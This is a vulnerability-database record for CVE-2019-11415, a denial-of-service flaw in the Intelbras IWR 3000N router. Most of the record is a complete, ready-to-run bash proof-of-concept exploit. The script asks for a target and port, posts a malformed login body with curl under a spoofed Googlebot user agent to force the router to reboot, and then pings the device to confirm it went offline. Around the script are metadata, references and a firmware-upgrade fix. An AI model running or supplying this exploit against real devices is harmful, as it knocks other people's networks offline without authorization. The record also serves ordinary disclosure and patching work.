ID
VAR-E-201904-0103
CVE
cve_id: | CVE-2019-11415 | Trust: 1.5 |
EDB ID
46768
TITLE
Intelbras IWR 3000N - Denial of Service (Remote Reboot) - Hardware dos Exploit
Trust: 0.6
DESCRIPTION
Intelbras IWR 3000N - Denial of Service (Remote Reboot). CVE-2019-11415 . dos exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | intelbras | model: | iwr 3000n | scope: | - | version: | - | Trust: 2.1 |
EXPLOIT
#/bin/bash
# PoC based on CVE-2019-11415 created by Social Engineering Neo.
#
# Credit: https://1.337.zone/2019/04/08/intelbras-iwr-3000n-any-version-dos-on-malformed-login-request/
#
# A malformed login request allows remote attackers to cause a denial of service (reboot), as demonstrated by JSON misparsing of the \""} string to v1/system/login.
#
# Upgrade to latest firmware version iwr-3000n-1.8.7_0 for 3000n routers to prevent this issue.
clear
read -p "Enter Target Address Followed by Port: " target port # localhost 8080
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Target May be Offline or Blocking ICMP requests.
read -p "Would you Like to Proceed? (Y/n): " ans
if [ "$ans" = 'n' ] || [ "$ans" = 'N' ]; then
clear
exit
fi
fi
if [ "$port" -lt 65536 ] && [ "$port" -gt 0 ]; then
grab=$(curl -s -A 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' --compressed --data-binary '\""}' $target:$port/v1/system/login)
else
echo "Incorrect Port."
fi
clear
alive=$(ping -c 1 $target | grep icmp* | wc -l)
if [ "$alive" -eq 0 ]; then
echo Router Successfully Taken Offline. #NOTE: if router blocks ICMP requests this may be inaccurate.
else
echo Exploit Unsuccessfull, Target May Not be Vulnerable.
fi
Trust: 1.0
EXPLOIT LANGUAGE
sh
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Denial of Service (Remote Reboot)
Trust: 1.6
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | proof of concept | Trust: 0.5 |
CREDITS
Social Engineering Neo
Trust: 0.6
EXTERNAL IDS
db: | EXPLOIT-DB | id: | 46768 | Trust: 1.6 |
db: | NVD | id: | CVE-2019-11415 | Trust: 1.5 |
db: | EDBNET | id: | 101389 | Trust: 0.6 |
db: | PACKETSTORM | id: | 152680 | Trust: 0.5 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2019-11415 | Trust: 1.5 |
url: | https://www.exploit-db.com/exploits/46768/ | Trust: 0.6 |
SOURCES
db: | PACKETSTORM | id: | 152680 |
db: | EXPLOIT-DB | id: | 46768 |
db: | EDBNET | id: | 101389 |
LAST UPDATE DATE
2022-07-27T09:18:12.470000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 152680 | date: | 2019-04-30T16:04:20 |
db: | EXPLOIT-DB | id: | 46768 | date: | 2019-04-30T00:00:00 |
db: | EDBNET | id: | 101389 | date: | 2019-04-30T00:00:00 |